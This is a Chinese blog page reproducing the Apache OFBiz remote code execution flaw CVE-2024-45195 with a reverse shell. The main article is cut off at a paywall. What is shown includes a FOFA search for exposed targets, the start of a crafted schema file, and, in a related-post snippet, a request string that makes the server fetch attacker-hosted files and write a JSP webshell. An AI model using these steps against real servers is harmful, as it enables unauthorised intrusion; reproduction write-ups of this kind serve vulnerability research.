CVE-2024-45195漏洞复现并反弹shell(Apache OFBiz 未授权远程代码执行漏洞)

最新推荐文章于 2025-01-23 13:47:50 发布
最新推荐文章于 2025-01-23 13:47:50 发布
阅读量1.1k 收藏 4
点赞数 7
分类专栏: CVE漏洞复现 文章标签: apache 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyytaotao/article/details/142179065
版权

本文利用了一个云服务器来远程代码执行并反弹shell.

远程代码执行

首先找目标资产,在fofa上直接搜app="Apache_OFBi
在这里插入图片描述

然后在我们的云服务器中创建两个文件:

rceschema.xml

<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
            <record name="rceentry" limit="many">
                <field name="jsp" type="String" length="605" position="0"></field>
最低0.47元/天 解锁文章
Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)
0xSec
09-06 1379
2024年9月,互联网上披露了Apache OFBiz 远程代码执行漏洞(CVE-2024-45195),该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
Apache OFBiz 未授权远程代码执行漏洞CVE-2024-45195
iSee857的博客
09-08 1147
Apache OFBiz是⼀个著名的电⼦商务平台,提供了创建基于最新 J2EE/ XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应⽤服务器的多层、分布式电⼦商务类WEB应⽤系统的框架。Apache OFBiz 18.12.16 之前版本中,由于Web 应用程序中缺少视图授权检查,未经身份验证的远程威胁者可构造恶意请求写入恶意文件导致远程代码执行,从而获取服务器权限。在服务器上启动一个python http服务用以 请求发送。服务器上启的http服务收到访问链接。访问下列接口进行RCE验证。
Apache OFBiz 远程代码执行漏洞复现(CVE-2024-45195)拿到shell
weixin_67840381的博客
09-12 1124
DATAFILE_LOCATION=http://公网ip:端口/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://公网ip:端口/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce。Host: 对方的host。这次使用的nc命令为。
Goby 漏洞发布|(CVE-2024-45195Apache OFBiz /viewdatafile 代码执行漏洞【已复现
m0_46699477的博客
09-10 544
CVE-2024-45195:Apache OFBiz /viewdatafile 代码执行漏洞,Apache OFBiz是一个开源企业资源规划(ERP)系统。它提供了一套企业应用程序,集成自动化企业的许多业务流程。 Apache OFBiz 存在远程代码执行漏洞远程攻击者可通过控制请求从而写入恶意文件获取服务器权限。
CVE-2024-4577-WINDOWS远程代码执行漏洞gelshell
m0_70266827的博客
06-27 1217
PHP 在设计时未充分考虑到 Windows 系统中对字符转换的 "Best-Fit" 特性。当 PHP-CGI(PHP 的通用网关接口实现,常用于 Windows 平台的 Web 服务器)在 Windows 平台上运行时,特别是在使用如中文等语系时,攻击者有可能利用这一特性构造恶意请求。这些恶意请求能够绕过 CVE-2012-1823 补丁的防护措施,导致攻击者可在 PHP 服务器上执行任意 PHP 代码PHP Windows版 8.3.0
TCP/IP远程代码执行漏洞CVE-2020-16898)复现
玄道的网安博客
11-06 1540
简介 Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时,存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞,攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。 漏洞概述 Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement(路由通告)数据包时存在漏洞远程攻击者通过构造..
Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856)
0xSec
08-05 1360
2024年8月,互联网上披露Apache OFBiz 授权不当致远程代码执行漏洞(CVE-2024-38856),该漏洞允许未经过身份验证的远程攻击者绕过原有通过特定URL绕过检测执行恶意代码的安全机制。攻击者可能利用该漏洞来执行恶意操作,包括但不限于获取敏感信息、修改数据或执行系统命令,最终可导致服务器失陷。
Apache Ofbiz XML-RPC RCE漏洞复现CVE-2023-49070)
0xSec
12-06 1992
2020年,为修复 CVE-2020-9496 增加权限校验,存在绕过。2021年,增加 Filter 用于拦截 XML-RPC 中的恶意请求,存在绕过。2023年四月,彻底删除 xmlrpc handler 以避免同类型的漏洞产生。尽管主分支在四月份已经移除了XML-RPC组件,但在Apache OFBiz的正式发布版本中,仅最新版本18.12.10彻底废除了XML-RPC功能。
Apache Ofbiz XMLRPC RCE漏洞CVE-2020-9496)复现
m0_48520508的博客
02-20 1435
0x00简介 Apache OFBiz全称是The ApacheOpen For Business Project。是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新的J2EE/XML规范和技术标准,构建大中型企业级、快平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz几乎实现了所有的J2EE核心设计模式,各个模块之间的耦合比较松散,用户能够比较容易的根据自己的需要进行拆卸,非常灵活。 0x01漏洞概述 Apache ofbiz 存在反序列化漏洞,攻击者
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 2000
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 3262
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
CVE-2024-38077 Windows远程桌面授权服务漏洞介绍
轻舟已过万重山
08-14 1574
漏洞编号漏洞类型:远程代码执行 (RCE)影响范围:Windows远程桌面授权服务危害程度:极高发现时间:2024年8月初。
严重 Zimbra RCE 漏洞遭大规模利用(CVE-2024-45519)
网络研究观
10-02 1928
攻击者正在积极利用 CVE-2024-45519,这是一个严重的 Zimbra 漏洞,该漏洞允许他们在易受攻击的安装上执行任意命令。
2024版】最新shell安装使用教程(非常详细)零基础入门到精通,收藏这一篇就够了_shell教程
2401_84301315的博客
05-02 732
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;到此为止,大概1个月的时间。sed软件的( )的功能可以记住正则表达式的一部分,其中,
超过2.2万个已删PyPI包竟存在被“复兴劫持”风险,供应链攻击新手段曝光!微软macOS应用惊爆八大漏洞,黑客可轻松获取无限制访问权限!| 安全周报0906
weixin_55163056的博客
09-06 1861
Apache OFBiz爆新漏洞远程代码执行威胁Linux与Windows安全;中国贸易公司遭新型跨平台恶意软件KTLVdoor猛烈攻击;Android用户务必立即安装最新安全补丁,堵截正在被黑客利用的漏洞;超过2.2万个已删PyPI包竟存在被“复兴劫持”风险
紧急警告:新0day漏洞被用于攻击暴露接口的防火墙,从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
01-23 961
该零日漏洞被命名为CVE - 2024 - 55591,CVSS评分为9.6,属于身份验证绕过漏洞。攻击者可通过精心构造的请求,利用Node.js WebSocket模块,绕过身份验证获取超级管理员权限。受影响的设备固件版本范围为FortiOS 7.0.0至7.0.16,以及FortiProxy 7.0.0至7.0.19和7.2.0至7.2.12。
安全研究年终总结:分享2024年RCE类的CVE漏洞高危EXP集合!
2401_89221445的博客
12-05 2755
缘起 网络安全漏洞不断变化且威胁日益严重,及时了解和修复这些漏洞至关重要。本文介绍的多个CVE漏洞,涉及常见的企业级软件和硬件,黑客可以利用这些漏洞远程控制系统、窃取敏感数据甚至完全破坏服务。 对于企业和开发者来说,了解这些漏洞不仅能帮助保护自己的系统,还能减少数据泄露、经济损失和品牌信誉的风险。因此,深入研究和及时修复这些漏洞是确保网络安全的关键步骤。 CVE-2024-8069 CVE-2024-8069 是一个影响 Citrix Session Recording 的严重漏洞,允许攻击者通过不安
Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467)复现
fly夏天的博客
01-12 920
Apache OFBiz groovy 远程代码执行漏洞CVE-2023-51467)复现
漏洞预警】FortiOS 和 FortiProxy 身份认证绕过漏洞(CVE-2024-55591)
李火火的安全圈
01-17 2057
2025年1月14日,Fortinet 发布安全公告(FG-IR-24-535)称修复了一个可导致FortiOS 和 FortiProxy身份验证绕过的高危漏洞CVE-2024-55591。攻击者可无需身份认证通过向 Node.js websocket 模块发送特制请求,最终获取设备的超级管理员权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值